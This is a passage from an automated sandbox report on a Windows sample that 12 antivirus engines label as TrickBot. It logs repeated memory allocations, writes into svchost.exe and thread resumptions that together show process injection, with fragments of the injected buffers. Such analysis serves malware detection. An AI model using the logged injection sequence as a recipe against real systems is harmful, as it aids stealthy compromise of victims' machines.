NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1

Potential code injection by writing to the memory of another process (50 out of 1063 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: UAVVWSHì`Hl$`HäðHùë0H¨ÇGXHOÿW0HHWA¸ÿÿÿÿE3ÉÿWkGX D$\D$\ø uWHw`HkFHD$PHD$PH=u\HFHLV@L^8H^0LN(LF HNHVHD$8LT$0L\$(H\$ ëpD$\øÅ3Àé\ÿÿÿHD$PH=«uPHFPH^HLV@L^8Lv0LN(LF HNHVHD$@H\$8LT$0L\$(Lt$ ÿH ¸éóþÿÿH\|$PtHD$PHø9uLF HNHVÿëÌÿëÈHD$PHøuHNÿëµHD$PHø&GÿÿÿHNHVÿëHÇ¨HHWE3ÀE3ÉÿWHÿW(HÇHOÿW(HÇG3ÉÿW83ÀHå[_^A^]ÃÌÌÌÌÌÌUVHì(Hl$ HäðHuPHöt@HEHM@HVpLFxLÉHHH¶HNÿV0HNºÿÿÿÿÿV He^]Ã base_address: 0x0000000000090000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: ,v +v/v Ùvð@úvÀ/ýv0ývúv base_address: 0x00000000000a0000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: H¹ H¸ ÿà base_address: 0x00000000ff76246c process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: VERSION.dll base_address: 0x0000000000470000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: ovG base_address: 0x0000000000480000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: ,v +v/v Ùvð@úvÀ/ýv0ývúvH base_address: 0x00000000000a0000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: GetFileVersionInfoA base_address: 0x0000000000470000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: 6vTüþG base_address: 0x0000000000480000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: ,v +v/v Ùvð@úvÀ/ýv0ývúvH base_address: 0x00000000000a0000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: VerQueryValueA base_address: 0x0000000000470000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: 6vTüþG base_address: 0x0000000000480000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: ,v +v/v Ùvð@úvÀ/ýv0ývúvH base_address: 0x00000000000a0000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: GetFileVersionInfoSizeA base_address: 0x0000000000470000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: 6vTüþG base_address: 0x0000000000480000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: ,v +v/v Ùvð@úvÀ/ýv0ývúvH base_address: 0x00000000000a0000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: KERNEL32.dll base_address: 0x0000000000470000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: ovG base_address: 0x0000000000480000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: ,v +v/v Ùvð@úvÀ/ýv0ývúvH base_address: 0x00000000000a0000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: GetLastError base_address: 0x0000000000470000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: 6vvG base_address: 0x0000000000480000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: ,v +v/v Ùvð@úvÀ/ýv0ývúvH base_address: 0x00000000000a0000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: HeapFree base_address: 0x0000000000470000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: 6vvG base_address: 0x0000000000480000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: ,v +v/v Ùvð@úvÀ/ýv0ývúvH base_address: 0x00000000000a0000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: HeapSize base_address: 0x0000000000470000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: 6vvG base_address: 0x0000000000480000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: ,v +v/v Ùvð@úvÀ/ýv0ývúvH base_address: 0x00000000000a0000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: HeapReAlloc base_address: 0x0000000000470000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: 6vvG base_address: 0x0000000000480000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: ,v +v/v Ùvð@úvÀ/ýv0ývúvH base_address: 0x00000000000a0000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: HeapAlloc base_address: 0x0000000000470000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: 6vvG base_address: 0x0000000000480000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: ,v +v/v Ùvð@úvÀ/ýv0ývúvH base_address: 0x00000000000a0000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: GetProcessHeap base_address: 0x0000000000470000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: 6vvG base_address: 0x0000000000480000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: ,v +v/v Ùvð@úvÀ/ýv0ývúvH base_address: 0x00000000000a0000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: lstrlenA base_address: 0x0000000000470000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: 6vvG base_address: 0x0000000000480000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: ,v +v/v Ùvð@úvÀ/ýv0ývúvH base_address: 0x00000000000a0000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: lstrcpyA base_address: 0x0000000000470000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: 6vvG base_address: 0x0000000000480000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: ,v +v/v Ùvð@úvÀ/ýv0ývúvH base_address: 0x00000000000a0000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: EnterCriticalSection base_address: 0x0000000000470000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: 6vvG base_address: 0x0000000000480000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: ,v +v/v Ùvð@úvÀ/ýv0ývúvH base_address: 0x00000000000a0000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: LeaveCriticalSection base_address: 0x0000000000470000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: 6vvG base_address: 0x0000000000480000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: ,v +v/v Ùvð@úvÀ/ýv0ývúvH base_address: 0x00000000000a0000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: InitializeCriticalSection base_address: 0x0000000000470000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: 6vvG base_address: 0x0000000000480000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1

File has been identified by 12 AntiVirus engines on VirusTotal as malicious (12 events)

Bkav	W32.AIDetect.malware2
CrowdStrike	win/malicious_confidence_90% (W)
Kaspersky	UDS:Trojan.Win32.Trickpak.gen
APEX	Malicious
McAfee-GW-Edition	Artemis
FireEye	Generic.mg.2ab4cc984ec0b93b
Sophos	Mal/Generic-R
Ikarus	Trojan-Spy.TrickBot
ZoneAlarm	UDS:DangerousObject.Multi.Generic
Microsoft	Trojan:Win32/TrickBot.Z!ibt
Cynet	Malicious (score: 100)
McAfee	Artemis!2AB4CC984EC0

Resumed a suspended thread in a remote process potentially indicative of process injection (6 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2216 resumed a thread in remote process 2824
Process injection	Process 2216 resumed a thread in remote process 3000
Process injection	Process 2216 resumed a thread in remote process 2212
NtResumeThread Aug. 5, 2021, 9:34 a.m.	thread_handle: 0x00000000000003f8 suspend_count: 1 process_identifier: 2824	1	0	0
NtResumeThread Aug. 5, 2021, 9:35 a.m.	thread_handle: 0x0000000000000418 suspend_count: 1 process_identifier: 3000	1	0	0
NtResumeThread Aug. 5, 2021, 9:35 a.m.	thread_handle: 0x0000000000000428 suspend_count: 1 process_identifier: 2212	1	0	0

Executed a process and injected code into it, probably while unpacking (50 out of 1823 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Aug. 5, 2021, 9:41 a.m.	thread_identifier: 2184 thread_handle: 0x00000114 process_identifier: 2180 current_directory: C:\Windows\system32 filepath: track: 1 command_line: C:\Windows\system32\cmd.exe filepath_r: stack_pivoted: 0 creation_flags: 134217740 (CREATE_NO_WINDOW\|CREATE_SUSPENDED\|DETACHED_PROCESS) inherit_handles: 0 process_handle: 0x00000118	1	1
CreateProcessInternalW Aug. 5, 2021, 9:41 a.m.	thread_identifier: 2220 thread_handle: 0x00000118 process_identifier: 2216 current_directory: C:\Windows\system32 filepath: track: 1 command_line: C:\Windows\system32\wermgr.exe filepath_r: stack_pivoted: 0 creation_flags: 134217740 (CREATE_NO_WINDOW\|CREATE_SUSPENDED\|DETACHED_PROCESS) inherit_handles: 0 process_handle: 0x00000114	1	1
CreateProcessInternalW Aug. 5, 2021, 9:34 a.m.	thread_identifier: 2828 thread_handle: 0x00000000000003f8 process_identifier: 2824 current_directory: filepath: track: 1 command_line: C:\Windows\system32\svchost.exe filepath_r: stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000000000003ec	1	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000090000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1	0
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: UAVVWSHì`Hl$`HäðHùë0H¨ÇGXHOÿW0HHWA¸ÿÿÿÿE3ÉÿWkGX D$\D$\ø uWHw`HkFHD$PHD$PH=u\HFHLV@L^8H^0LN(LF HNHVHD$8LT$0L\$(H\$ ëpD$\øÅ3Àé\ÿÿÿHD$PH=«uPHFPH^HLV@L^8Lv0LN(LF HNHVHD$@H\$8LT$0L\$(Lt$ ÿH ¸éóþÿÿH\|$PtHD$PHø9uLF HNHVÿëÌÿëÈHD$PHøuHNÿëµHD$PHø&GÿÿÿHNHVÿëHÇ¨HHWE3ÀE3ÉÿWHÿW(HÇHOÿW(HÇG3ÉÿW83ÀHå[_^A^]ÃÌÌÌÌÌÌUVHì(Hl$ HäðHuPHöt@HEHM@HVpLFxLÉHHH¶HNÿV0HNºÿÿÿÿÿV He^]Ã base_address: 0x0000000000090000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000000a0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1	0
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: ,v +v/v Ùvð@úvÀ/ýv0ývúv base_address: 0x00000000000a0000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: H¹ H¸ ÿà base_address: 0x00000000ff76246c process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
NtResumeThread Aug. 5, 2021, 9:34 a.m.	thread_handle: 0x00000000000003f8 suspend_count: 1 process_identifier: 2824	1	0
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 790528 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000180000000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0x00000000000003ec	1	0
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 4 (PAGE_READWRITE) base_address: 0x0000000180000000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x00000000000003ec	1	0
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1	0
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: VERSION.dll base_address: 0x0000000000470000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1	0
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: ovG base_address: 0x0000000000480000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: ,v +v/v Ùvð@úvÀ/ýv0ývúvH base_address: 0x00000000000a0000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1	0
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: GetFileVersionInfoA base_address: 0x0000000000470000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1	0
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: 6vTüþG base_address: 0x0000000000480000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: ,v +v/v Ùvð@úvÀ/ýv0ývúvH base_address: 0x00000000000a0000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1	0
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: VerQueryValueA base_address: 0x0000000000470000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1	0
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: 6vTüþG base_address: 0x0000000000480000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: ,v +v/v Ùvð@úvÀ/ýv0ývúvH base_address: 0x00000000000a0000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1	0
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: GetFileVersionInfoSizeA base_address: 0x0000000000470000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1	0
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: 6vTüþG base_address: 0x0000000000480000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: ,v +v/v Ùvð@úvÀ/ýv0ývúvH base_address: 0x00000000000a0000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1	0
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: KERNEL32.dll base_address: 0x0000000000470000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1	0
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: ovG base_address: 0x0000000000480000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: ,v +v/v Ùvð@úvÀ/ýv0ývúvH base_address: 0x00000000000a0000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1	0
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: GetLastError base_address: 0x0000000000470000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1	0
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: 6vvG base_address: 0x0000000000480000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: ,v +v/v Ùvð@úvÀ/ýv0ývúvH base_address: 0x00000000000a0000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1	0
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: HeapFree base_address: 0x0000000000470000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1	0
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: 6vvG base_address: 0x0000000000480000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: ,v +v/v Ùvð@úvÀ/ýv0ývúvH base_address: 0x00000000000a0000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1	0
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: HeapSize base_address: 0x0000000000470000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1
NtAllocateVirtualMemory Aug. 5, 2021, 9:34 a.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003ec	1	0
WriteProcessMemory Aug. 5, 2021, 9:34 a.m.	buffer: 6vvG base_address: 0x0000000000480000 process_identifier: 2824 process_handle: 0x00000000000003ec	1	1

ggi8w3183a1077e104d07a84291d0d5dcc1de

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All